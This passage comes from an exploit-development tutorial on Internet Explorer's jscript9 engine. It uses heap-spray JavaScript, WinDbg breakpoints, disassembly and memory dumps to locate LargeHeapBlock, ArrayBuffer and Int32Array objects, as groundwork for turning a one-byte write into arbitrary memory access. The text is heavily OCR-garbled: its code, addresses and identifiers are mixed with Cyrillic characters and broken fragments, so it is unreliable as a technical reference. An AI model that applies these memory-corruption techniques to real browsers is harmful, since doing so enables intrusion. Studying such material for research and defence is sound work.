address 25fcbe80 found in 

_HEAP @ 300000 

HEAP ENTRY Size Prev Flags UserPtr UserSize - state 
25fcbe78 000c 0000 [00] 25fcbe80 00054 - (busy) 
jscript9!LargeHeapBlock:: vftable' 





Yes, it was! It’s size is 0x54 bytes and is preceded by an allocation header of 8 bytes (UserPtr — 
HEAP_ENTRY == 8). That’s all we need to know. 


We can put a breakpoint right after the call to AddLargeHeapBlock: 


bp jscript9!Recycler::LargeAlloc+0x66 ".printf \"new LargeHeapBlock: addr = 0x%p\\n\",eax;g" 





We should have a look at a LargeHeapBlock. First, let’s change the javascript code a bit so that fewer 
LargeHeapBlock are created: 


XHTML 


language="javascript"> 
Start"); 


ау(); 
for (var i = 0; і < 0x100; ++) { 
ali] = new Array(0x1000/4); 
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OxTfffffff; 
-2; 


t.createElement('div"); 


Set the breakpoint we just saw: 





bp jscript9!Recycler::LargeAlloc+0x66 ".printf \"new LargeHeapBlock: addr = 0x%p\\n\",eax;g" 





Now reload the page in IE and close the first dialog box. 


Your output should look similar to this: 


new LargeHeapBlock: 
new [агдеНеарВоск: 
new LargeHeapBlock: 
new [агдеНеарВоск: 
new LargeHeapBlock: 
new [агдеНеарВоск: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new [агдеНеарВоск: 
new [агдеНеарВоск: 
new LargeHeapBlock: 
new ГагдеНеарвВіоск: 
new [агдеНеарВоск: 
new [агдеНеарВоск: 
new LargeHeapBlock: 
new LargeHeapBlock: 


new LargeHeapBlock: 


new ГагдеНеарвВіоск: 
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addr = 0x042a7368 
addr = 0x042a73c8 
addr = 0x042a7428 
addr = 0x042a7488 
addr = 0x042a74e8 
addr = 0x042a7548 
addr = 0x042a75a8 
addr = 0х042а7608 
addr = 0х042а7668 
addr = 0х042а76с8 
адаг = 0х042а7728 
addr = 0x042a7788 
addr = 0x042a77e8 
addr = 0х042а7848 
addr = 0х042а78а8 
addr = 0x042a7908 
addr = 0х042а7968 
addr = 0х042а79с8 
адаг = 0x042a7a28 
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new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 


new LargeHeapBlock: 


new LargeHeapBlock: 
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addr = 0x042a7a88 
addr = 0х042а7ае8 
addr = 0x042a7b48 
addr = 0x042a7ba8 
addr = 0x042a7c08 
адаг = 0х042а7с68 
addr = 0х042а7сс8 
addr = 0x042a7d28 
addr = 0x042a7d88 
addr = 0x042a7de8 
addr = 0х042а7е48 
addr = 0x042a7ea8 
addr = 0x042a7f08 
addr = 0x042a7168 
addr = 0х042а71с8 
addr = 0х042а8028 
addr = 0x042a8088 
addr = 0x042a80e8 
addr = 0x134a9020 
addr = 0х134а9080 
addr = 0x134a90e0 
addr = 0x134a9140 
addr = 0x134a91a0 
addr = 0x134a9200 
addr = 0x134a9260 
addr = 0x134a92c0 
addr = 0x134a9320 
addr = 0x134a9380 
addr = 0x134a93e0 
addr = 0x134a9440 
addr = 0х134а94а0 
addr = 0x134a9500 
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new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 


new LargeHeapBlock: 


new LargeHeapBlock: 
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addr = 0x134a9560 
addr = 0x134a95c0 
addr = 0x134a9620 
addr = 0x134a9680 
адаг = Ох134а96е0 
addr = 0x134a9740 
addr = 0x134a97a0 
addr = 0x134a9800 
addr = 0x134a9860 
addr = Ох134а98с0 
addr = 0х134а9920 
addr = 0x134a9980 
addr = 0x134a99e0 
addr = 0x134a9a40 
addr = 0x134a9aa0 
addr = 0х134а9600 
addr = 0x134a9b60 
addr = 0x134a9bcO0 
addr = 0х134а9с20 
addr = 0х134а9с80 
addr = 0x134a9ce0 
addr = 0x134a9d40 
addr = 0x134a9da0 
адаг = 0х134а9е00 
addr = 0x134a9e60 
адаг = Ох134адесо 
addr = 0x134a9f20 
addr = 0x134a9f80 
addr = 0х1380е060 
addr = 0х1380е0с0 
addr = 0x1380e120 
addr = 0x1380e180 
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new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 


new LargeHeapBlock: 


new LargeHeapBlock: 
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addr = Ох1380е1е0 
addr = 0x1380e240 
addr = 0x1380e2a0 
addr = 0x1380e300 
addr = 0x1380e360 
addr = 0x1380e3c0 
addr = 0x1380e420 
addr = 0x1380e480 
addr = 0x1380e4e0 
addr = 0x1380e540 
addr = 0x1380e5a0 
addr = 0x1380e600 
addr = 0x1380e660 
addr = 0x1380e6c0 
addr = 0x1380e720 
addr = 0x1380e780 
addr = Ох1380е7е0 
addr = 0х1380е840 
addr = 0x1380e8a0 
addr = 0x1380e900 
addr = 0x1380e960 
addr = 0x1380e9c0 
addr = 0x1380ea20 
addr = 0x1380ea80 
addr = 0x1380eae0 
addr = 0x1380eb40 
addr = 0x1380eba0 
addr = 0x1380ec00 
addr = 0x1380ec60 
addr = 0х1380есс0 
addr = 0x1380ed20 
addr = 0x1380ed80 
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new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 


new LargeHeapBlock: 


new LargeHeapBlock: 


new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 


new LargeHeapBlock: 
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addr = 0x1380ede0 
addr = 0x1380ee40 
addr = 0x1380eea0 
addr = 0х1380е100 
адаг = Ох1380е160 
addr = 0x1380efcO0 
addr = 0x16ccb020 
addr = 0x16ccb080 
addr = 0x16ccb0e0 
addr = 0x16ccb140 
addr = 0x16ccb1a0 
аааг = 0х16ссЬ200 
addr = Ox16ccb260 
addr = 0х16ссЬ2с0 
addr = Ох16сс6320 
addr = 0x16ccb380 
addr = Ox16ccb3e0 
addr = Ox16ccb440 
addr = 0х16ссЬ4а0 
аааг = 0x16ccb500 
addr = 0x16ccb560 
addr = 0x16ccb5c0 
addr = 0x16ccb620 
addr = 0x16ccb680 
addr = 0x16ccb6e0 
addr = 0x16ccb740 
addr = 0x16ccb7a0 
addr = 0x16ccb800 
addr = 0x16ccb860 
addr = 0x16ccb8c0 
addr = 0x16ccb920 
addr = 0x16ccb980 
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new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 


new LargeHeapBlock: 


new LargeHeapBlock: 


- 326 - 


addr = 0x16ccb9e0 
addr = 0x16ccba40 
addr = 0x16ccbaa0 
addr = 0x16ccbb00 
addr = 0x16ccbb60 
addr = 0x16ccbbc0 
addr = 0x16ccbc20 
addr = 0x16ccbc80 
addr = 0x16ccbce0 
addr = 0x16ccbd40 
addr = 0x16ccbda0 
addr = 0x16ccbe00 
addr = 0x16ccbe60 
addr = 0x16ccbec0 
addr = 0x16ccbf20 
addr = 0x16ccbf80 
addr = 0x16ccc020 
addr = 0x16ccc080 
addr = 0x16ccc0e0 
addr = 0x16ccc140 
addr = 0x16ccc1a0 
addr = 0х16ссс200 
addr = 0x16ccc260 
addr = 0x16ccc2c0 
addr = 0x16ccc320 
addr = 0x16ccc380 
addr = 0x16ccc3e0 
addr = 0х16ссс440 
addr = 0x16ccc4a0 
addr = 0x16ccc500 
addr = 0x16ccc560 
addr = 0x16ccc5c0 
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new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 


new LargeHeapBlock: 


new LargeHeapBlock: 
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addr = 0х16сссб20 
addr = 0x16ccc680 
addr = 0x16ccc6e0 
адаг = 0х16ссс740 
addr = 0x16ccc7a0 
addr = 0x16ccc800 
аааг = 0х16ссс860 
addr = 0х16ссс8с0 
addr = 0x16ccc920 
addr = 0x16ccc980 
addr = 0x16ccc9e0 
addr = 0x16ccca40 
addr = 0x16cccaa0 
addr = Ox16cccb00 
addr = 0x16cccb60 
addr = 0x16cccbc0 
addr = 0х16сссс20 
addr = 0х16сссс80 
addr = 0x16cccce0 
addr = 0x16cccd40 
addr = Ох16сссааО 
addr = Ох1бсссе00 
addr = Ох1бсссебо 
addr = Ох16сссес0 
addr = 0х16бсссѓ20 

адаг = Ox16cccf80 

addr = 0x1364e060 
addr = 0x1364e0c0 
addr = 0x1364e120 
addr = 0x1364e180 
адаг = 0х1364е1е0 
addr = 0x1364e240 
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new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 


new LargeHeapBlock: 


new LargeHeapBlock: 
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адаг = 0х1364е2а0 
addr = 0x1364e300 
addr = 0x1364e360 
addr = 0х1364е3с0 
addr = 0x1364e420 
addr = 0x1364e480 
addr = 0x1364e4e0 
addr = 0x1364e540 
addr = 0x1364e5a0 
addr = 0x1364e600 
addr = 0x1364e660 
addr = 0x1364e6c0 
addr = 0x1364e720 
addr = 0x1364e780 
addr = 0x1364e7e0 
addr = 0x1364e840 
addr = 0x1364e8a0 
addr = 0x1364e900 
addr = 0x1364e960 
addr = 0x1364e9c0 
addr = 0x1364ea20 
addr = 0x1364ea80 
addr = 0x1364eae0 
addr = 0x1364eb40 
addr = 0x1364eba0 
addr = 0х1364ес00 
addr = 0x1364ec60 
addr = 0x1364ecc0 
addr = 0x1364ed20 
addr = 0x1364ed80 
addr = 0x1364edeO 
addr = 0x1364ee40 
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new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 


new LargeHeapBlock: 


new LargeHeapBlock: 


new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 


new LargeHeapBlock: 


addr = 0x1364eea0 
addr = 0х1364е 00 
addr = Ox1364ef60 
addr = Ох1364е1с0 
аддг = 0х13641060 
addr = 0x1364f0c0 
addr = 0x1364f120 
addr = 0x1364f180 
addr = 0x1364f1e0 
addr = 0х13641240 
addr = 0x1364f2a0 
addr = 0х13641300 
addr = 0x1364f360 
addr = 0x1364f3c0 


Let's look at the last 6 addresses: 


new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 
new LargeHeapBlock: 


new LargeHeapBlock: 


new LargeHeapBlock: 


адаг = 0x1364f1e0 
addr = 0x1364f240 
addr = 0x1364f2a0 
addr = 0x1364f300 
addr = 0x1364f360 
addr = 0x1364f3c0 








First of all, note that they’re 0x60 bytes apart: 0x8 bytes for the allocation header and 0x58 bytes for the 
LargeHeapBlock object. Here are the last 6 LargeHeapBlocks in memory: 
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As we can see, each contains, af offset , a pointer to the previous 
This pointer will be used later to determine the address of the itself. 


ArrayBuffer & Int32Array 
Here's what the MDN (Mozilla Developer Network) says about 


The object is used to represent a generic, fixed-length raw binary data buffer. You can 
not directly manipulate the contents of an ; instead, you create one of the typed array 
objects or a object which represents the buffer in a specific format, and use that to read 


and write the contents of the buffer. 
Consider the following example: 


JavaScript 


ArrayBuffer manually. 
400*1024*1024); 
Р); 


n ArrayBuffer automatically. 
a2 - new Int 1y(100*1024*1024); 
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The arrays a and a2 are equivalent and have the same length. When creating an ArrayBuffer directly we 
need to specify the size in bytes, whereas when creating an Int32Array we need to specify the length in 
number of elements (32-bit integers). Note that when we create an Int32Array, an ArrayBuffer is created 
internally and the Int32Array uses it. 


To find out what code creates an ArrayBuffer, we can perform а heap spray like before. Let’s use the 
following javascript code: 


XHTML 


| = new Array(); 
r i = 0; i < 0x10000; ++i) { 
ew Ir (0x1000/4); 
rj = 0; j < а Лепаћ; ++j) 





When the dialog box with the text Done pops up, we can look at the memory with VMMap. Here’s what we 
see: 
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/sinternals.com 


ons Help 


ess: iexplore.exe 
PID: 2804 


= | Address Space Fragmentation 
Committed: 


| | 0х00000000 


Private Bytes: 




















Working 


Ox2FOBA000 








Note that this time it says , which means that the are allocated directly on 
the heap. If we look at the address in WinDbg, we see this: 


0f650000: 03964205 0101f3c5 ffeeffee 00000000 10620010 0e680010 00450000 01650000 
01650020: 00000140 01650040 10620000 00000001 00000001 00000000 10610НО 10610НО 
01650040: 839ес20а 0801f3cd 0а731528 Осбасс48 00000012 #Юе0адсо 39682cf0 88000000 


01650060: 00000123 00000123 00000123 00000123 00000123 00000123 00000123 00000123 
01650080: 00000123 00000123 00000123 00000123 00000123 00000123 00000123 00000123 
0Ї6500а0: 00000123 00000123 00000123 00000123 00000123 00000123 00000123 00000123 





http://expdev-kiuhnm.rhcloud.com 





-332- 





EXPLOIT DEVELOPMENT COMMUNITY 


Of6500c0: 00000123 00000123 00000123 00000123 00000123 00000123 00000123 00000123 


0f650060: 00000123 00000123 00000123 00000123 00000123 00000123 00000123 00000123 





Our data begins at 1650060. Since it's on the heap, let's use !heap: 


0:012» !heap -p -a f650060 
address 01650060 found in 
 HEAP @ 450000 
HEAP ENTRY Size Prev Flags UserPtr UserSize - state 
0f650058 0201 0000 [00] Of650060 01000 - (busy) 





As always, there are 8 bytes of allocation header. If we reload the page in IE and go back to WinDbg, we 
can see that the situation hasn’t changed: 


01650000: 03964205 0101f3c5 ffeeffee 00000000 10620010 0е680010 00450000 01650000 
01650020: 00000140 01650040 10620000 000000сс 00000004 00000000 10310НО 1061080 
01650040: 839ec20d 0801#Зса 129е0158 11119048 00000012 #е0а0со 21854880 88000000 
01650060: 00000123 00000123 00000123 00000123 00000123 00000123 00000123 00000123 
01650080: 00000123 00000123 00000123 00000123 00000123 00000123 00000123 00000123 
0Ї6500а0: 00000123 00000123 00000123 00000123 00000123 00000123 00000123 00000123 
Of6500c0: 00000123 00000123 00000123 00000123 00000123 00000123 00000123 00000123 
0f650060: 00000123 00000123 00000123 00000123 00000123 00000123 00000123 00000123 





This means that we could put a hardware breakpoint at the address 01650058 (HEAP ENTRY above) and 
break оп the code which make the allocation on the heap. Reload the page in | and set the breakpoint in 
WinDbg: 


0:013» ba w4 f650058 


After closing the dialog box in IE, we break here: 


772179ff 331da4002e77 хог  ebx,dword ptr [ntdll!RtlpLFHKey (772е00а4)] 
77217а05 с6410780 mov byte ptr [ecx*7],80h 
77217а09 3348 xor ebx,eax 


7721та0б ЗЗае xor ebx,esi 
77217a0d #4414 dec dword ptr (519192016181) 
77217a10 8919 mov  dword ptr [ecx],ebx 
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77217а12 с60200 mov byte ptr [edx],0 45:0026:0165005е=00 < we аге here 
77217a15 75be jne _ ntdil!RtlpSubSegmentinitialize+Oxe5 (77217945) 

77217а1т 8b5d08 mov  ebx,dword ptr [ebp+8] 

77217a1a 8b45f8 mov  eax,dword ptr [ebp-8] 


77217a1d ра# #0000 тоу  edx,OFFFFh 
77217а22 66895108 mov word ptr [ecx+8],dx 
7721Та26 6686490 mov  cx,word ptr [ebp-10h] 
77217а2а 66894е10 mov мога ptr [esi+10h],cx 





Here's the stack trace: 


0:004» k 10 

ChildEBP RetAddr 

057db90c 77216е87 ntdll!RtlbSubSegmentinitialize+Ox122 

057db9a8 772060f2 ntdll!RtlpLowFragHeapAllocFromContext+0x882 
057dba1c 75de94d45 ntdlI'RtlAllocateHeap*0x206 

057dba3c 61714613 msvert!malloc+0x8d 

057dba4c 6f643cfa jscript9!memset*0x3a4c2 

057dba64 6f79fc00 jscript9!Js::JavascriptArrayBuffer::CreatetOx3c < 
057dba90 6f79af10 jscript9!Js::TypedArrayBase::CreateNewInstance*Ox1cf < 
057dbb08 6f5c7461 jscript9!Js::TypedArray<int>::Newlnstance+0x55 < 
057dbca4 6f5a5cf5 jscript9! Js::InterpreterStackFrame::Process+0x4b47 
057dbdd4 04a70fe9 jscript9! Js::InterpreterStackFrame::InterpreterT hunk<1>+0x305 


WARNING: Frame IP not in any known module. Following frames may be wrong. 
057dbdeO 6f5a1f60 0x4a70fe9 

057dbe60 6f5a20ca jscript9! Js::JavascriptFunction::CallRootFunction+0x140 
057dbe78 6f5a209f jscript9!Js::JavascriptFunction::CallRootFunction+0x19 
057dbec0 6f5a2027 jscript9!ScriptSite::CallRootFunction+0x40 

057dbee8 6f64df75 jscript9!ScriptSite::Execute+0x61 

057dbf74 6f64db57 jscript9!ScriptEngine::ExecutePendingScripts+0x1e9 





Perfect! We see that the ArrayBuffer is allocated with a C's malloc, which is called inside 
jscript9!Js::JavascriptArrayBuffer::Create. TypedArray<int> is probably our Int32Array and TypedArrayBase 
is its base class. So, jscript9!Js::TypedArray<int>::Newlnstance creates а new Int32Array and a new 
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JavascriptArrayBuffer. Now we should have a look at an Int32Array in memory. We don't need to spray the 
heap anymore, so let’s change the code: 


XHTML 


‘script language="javascript" 
alert("Start' 
a | rray(0x1000); 


a.length; ++j) 





Let's put a breakpoint on the creation of a new Int32Array: 


0:013> bp jscript9!Js::TypedArray<int>::NewInstance 
Couldn't resolve error at 'jscript9!Js::TypedArray«int» ::NewInstance' 
The breakpoint expression "jscript9! Js:: TypedArray«int» ::NewInstance" evaluates to the inline function. 


Please use bm command to set breakpoints instead of bp. 





Let's try to use bm instead: 


0:013> рт jscript9!Js::TypedArray<int>::Newlnstance 
1: 6f79aebb @!"jscript9!Js::TypedArray<int>::Newlnstance" 
0:013» Ы 
1e6f79aebb 0001 (0001) 0:**** jscript9!Js::TypedArray<int>::NewInstance 





OK, it seems it worked. Now reload the page in IE. When we close the dialog box, we break on 
jscript9!Js:: TypedArray<int>::Newlnstance. Here's the entire function: 

0:004» uf 6f/9aebb 

jscript9!Js::TypedArray<int>::Newlnstance: 

6f79aebb 8bff mov  edi,edi 

6f79aebd 55 push ебр 


6f79aebe Врес mov  ebp,esp 
6f79aecO 83e4f8 and esp,OFFFFFFF8h 
6f79aec3 8Зесос sub евр,0Сһ 
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6f79aec6 53 push ебх 

6f79aec7 865908 mov  ebx,dword ptr [ebp+8] 

6f79aeca 864304 mov  eax,dword ptr [ebx-*4] 

6f79aecd 8b4004 mov  eax,dword ptr [еах+4] 

бғ79аеао 864804 mov  ecx,dword ptr [еах+4] 

6f79aed3 56 ризћ esi 

6f79aed4 57 push edi 

6f79aed5 ба00 ризћ 0 

6f79aed7 51 push ecx 

6f79aed8 8b8934020000 тоу ecx,dword ptr [ecx+234h] 

6f79aede ра00040000 тоу еах,400һ 

6f79aee3 e8b2e7e0ff call jscript9!ThreadContext::ProbeStack (6f5a969a) 
6f/9aee8 8d4510 lea eax,[ebp+10h] 

6f79aeeb 50 push еах 

6 даеес 8d7d0c lea edi,[ebp+0Ch] 

ef/9aeef 81742414 lea esi,[esp+14h] 

6f79aef3 e8cb93e0ff call jscript9!Js::ArgumentReader::ArgumentReader (6f5a42c3) 
6f79aef8 8b4304 mov  eax,dword ptr [ебх+4] 

6f79aefb 864004 mov  eax,dword ptr [еах+4] 

6f79aefe 685069726: push offset jscript9!Js::TypedArray<int>::Create (6f72bd50) 
6f79af03 ба04 push 4 

6179а105 #7004 push dword ptr [еах+4] 

6f79af08 8рсб mov eax,esi 

6f79af0a 50 push еах 

6f79afOb e8214b0000 call jscript9!Js::TypedArrayBase::CreateNewlnstance (6f79fa31) 
ef79af10 5f рор edi 

6f79af11 5e pop esi 

6179а 12 56 pop ебх 

6f79af13 дре5 mov  esp,ebp 

6f79af15 5d рор ерр 

ef79af16 c3 ret 
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By stepping inside jscript9!Js::TypedArrayBase::CreateNewInstance we come across a call to 
jscript9!Js:: TypedArray<int>::Create: 


61791216 #6608060000 push dword ptr [еѕі+608һ] 
6f79fc1c 57 push edi 
6f79fc1d 51 push ecx 


6f79fc1e 53 push ебх 
6f79fc1f #5514 call dword ptr [ebp* 14h] ss:002b:057dba9c={jscript9!Js::TypedArray<int>::Create (6f72bd50)} 





If we step inside jscript9!Js::TypedArray<int>::Create, we get to a call to Alloc: 


6f72bd88 86 7514 mov  esi,dword ptr [ebp-* 14h] ss:002b:057dba64-04b6b000 
6f72bd8b 864е0с mov  ecx,dword ptr [esitOCh] 

6f72bd8e 6a24 push 24h 24h bytes 

6f72bd90 e893b2e6ff call jscript9!Recycler::Alloc (61597028) 

6f72bd95 ffb61c010000 push dword ptr [esi* 11Ch] 

6f72bd9b #7510 push dword ptr [ebp+10h] 

6f72bd9e ff/50c push dword ptr [ebp+0Ch] 

6f72bda1 57 push edi 

6f72bda2 50 push eax 

6f72bda3 e898f7ffff са! jscript9!Js::TypedArray<int>::TypedArray<int> (6f72b540) 
6f72bda8 5f рор edi 

6f72bda9 5e pop esi 

6f72bdaa c9 leave 

6f72bdab c21000 ret 10h 





We can see that the TypedArray<int> object is 24h bytes. Note that the object is first allocated and then 
initialized by the constructor. 


To print a message when an !nt32Array is created, we can put a breakpoint at the end of 
jecript9!Js::TypedArray«int» ::NewlInstance, right after the call to 
jscript9!Js:: TypedArrayBase::CreateNewlnstance (see the arrow): 


jscript9!Js::TypedArray«int»::Newlnstance: 
6f79aebb 8bff mov  edi,edi 


6f79aebd 55 push ебр 


6f79aebe 8bec mov  ebp,esp 
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6f79aecO 83e4f8 and  esp,OFFFFFFF8h 

6f79aec3 8Зесос sub евр,0Сһ 

6f79aec6 53 push ебх 

6f79aec7 8b5d08 mov  ebx,dword ptr [ebp+8] 

6 даеса 8b4304 mov  eax,dword ptr [ebx-*4] 

6f79aecd 8b4004 mov  eax,dword ptr [eax+4] 

6f79aed0 864804 mov  ecx,dword ptr [еах+4] 

6f79aed3 56 push esi 

6f79aed4 57 push edi 

6f79aed5 ба00 push 0 

6f79aed7 51 push ecx 

бғ79аеа8 8608934020000 тоу есх,амога ptr [есх+2341] 

6f79aede баооод0000 mov 6edr,400h 

6f79aee3 e8b2e7e0ff call jscript9!ThreadContext::ProbeStack (6f5a969a) 
6f79aee8 8d4510 lea eax,[ebp+10h] 

6f79aeeb 50 push eax 

6f79aeec 8d7d0c lea edi,[ebp+0Ch] 

6f79aeef 81742414 lea esi,[esp+14h] 

6f79aef3 e8cb93e0ff call jscript9!Js::ArgumentReader::ArgumentReader (6f5a42c3) 
6f79aef8 8b4304 mov  eax,dword ptr [ебх+4] 

6f79aefb 864004 mov  eax,dword ptr [еах+4] 

6f79aefe 6850bd726f push offset jscript9!Js::TypedArray<int>::Create (6f72bd50) 
ef79af03 ба04 ризћ 4 

6179а105 #7004 push dword ptr [eax+4] 

6f79af08 8рсб том eax,esi 

6f79af0a 50 push eax 

6f79afOb e8214b0000 call jscript9!Js::TypedArrayBase::CreateNewlnstance (6f79fa31) 
ef79af10 5f | breakpoint here 

ef79af11 Бе 

ef79af12 5b 

ef79af13 8be5 

ef79af15 5d 
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6f79af16 сз ret 


Here’s the breakpoint: 


bp jscript9+20af10 ".printf "new TypedArray<int>: addr = Ox%p\\n\",eax;g" 





We should also take a look at jscript9!Js::JavascriptArrayBuffer::Create: 


0:004> uf jscript9!Js::JavascriptArrayBuffer::Create 
jscript9!Js::JavascriptArrayBuffer::Create: 

6f643cbe 8bff mov edi,edi 

6f643cc0 55 push ебр 

6f643cc1 8bec том ебр,еѕр 

6f643cc3 53 push ebx 

61643сс4 8b5d08 mov ebx,dword ptr [ebp+8] 
6f643cc7 56 push esi 

6f643cc8 57 push edi 

6f643cc9 8bf8 mov  edi,eax 

6f643ccb 8b4304 mov  eax,dword ptr [ебх+4] 
6f643cce 8b4004 mov  eax,dword ptr [eax+4] 
6f643cd1 8bb064040000 тоу  esi,dword ptr [eax+464h] 


6f643cd7 01be04410000 add dword ptr [esit4104h],edi 
6f643cdd е859365# call jscript9!Recycler::CollectNow<402722819> (6f59733b) 
61643се2 6a18 push 18h bytes 


6f643ce4 8bce том есх,еѕі 

6f643ce6 e8b958f5ff call jscript9!Recycler::AllocFinalized (6f5995a4) 

6f643ceb ff353cb1826f push dword ptr [jscript9!_ imp malloc (6f82b13c)] < 

efe43cf1 8bf0 mov esi,eax 

6f643cf3 8bcb mov ecx,ebx 

6f643cf5 e863010000 = са! jscript9!Js::ArrayBuffer::ArrayBuffer<void * (__cdecl*)(unsigned int)> (6f643e5d) 
6f643cfa 5f рор edi 

6f643cfb c/06103d646f mov  dword ptr [esi], offset jscript9! Js::JavascriptArrayBuffer:: vftable' (6f643d10) 
61643901 86сб mov еах,еѕі 

6f643d03 5e рор esi 
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6f643d04 5b 
6f643d05 5d 
61643406 с20400 put a breakpoint here 
As you can see, an is an object of bytes which is allocated through 
. Its almost certain that contains a pointer to a block of memory 
which contains the user data. In fact, you can see that is passed to the constructor of 


and we already know that the raw buffer is indeed allocated with C’s 


We can now put a breakpoint а then end of the function: 


bp jscript9!Js::JavascriptArrayBuffer::Create+0x48 ".printf \"new JavascriptArrayBuffer: addr = Ox%p\\n\",eax;g" 





These objects are easy to analyze. Here's what we learned: 


TypedArray<int> is 24h bytes and is allocated through 


jscript9!Js:: TypedArray«int»:: vftable' jscript9!Recycler::Alloc 


bp jscript9+20af10 "printf \"new TypedArray<int>: addr = Ox%p\\n\",eax;g" 


азон] 


045598а0 00000000 00000003 00000004 00‹ 00001000 


JavascriptArrayBuffer is 18h bytes and is allocated through 
jscript9!Recycler::AllocFinalized 


bp jscript9!Js::JavascriptArrayBuffer::Create+ 0x48 ".printf \"new 
JavascriptArrayBuffer: addr = Ox%p\\n\",eax;g" 


mk raw buffer size in bytes 


410|04559а20 00000000 00000003 [0471bd18]|| 


jscript9!Js::JavascriptArrayBuffer:: vftable' 


Raw buffer allocated with C's malloc 


0123 00000123 00000123 
2 


0123 00000123 000001 


3 
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As we said before, if we can modify a single byte at an arbitrary address, we can get read/write access to 
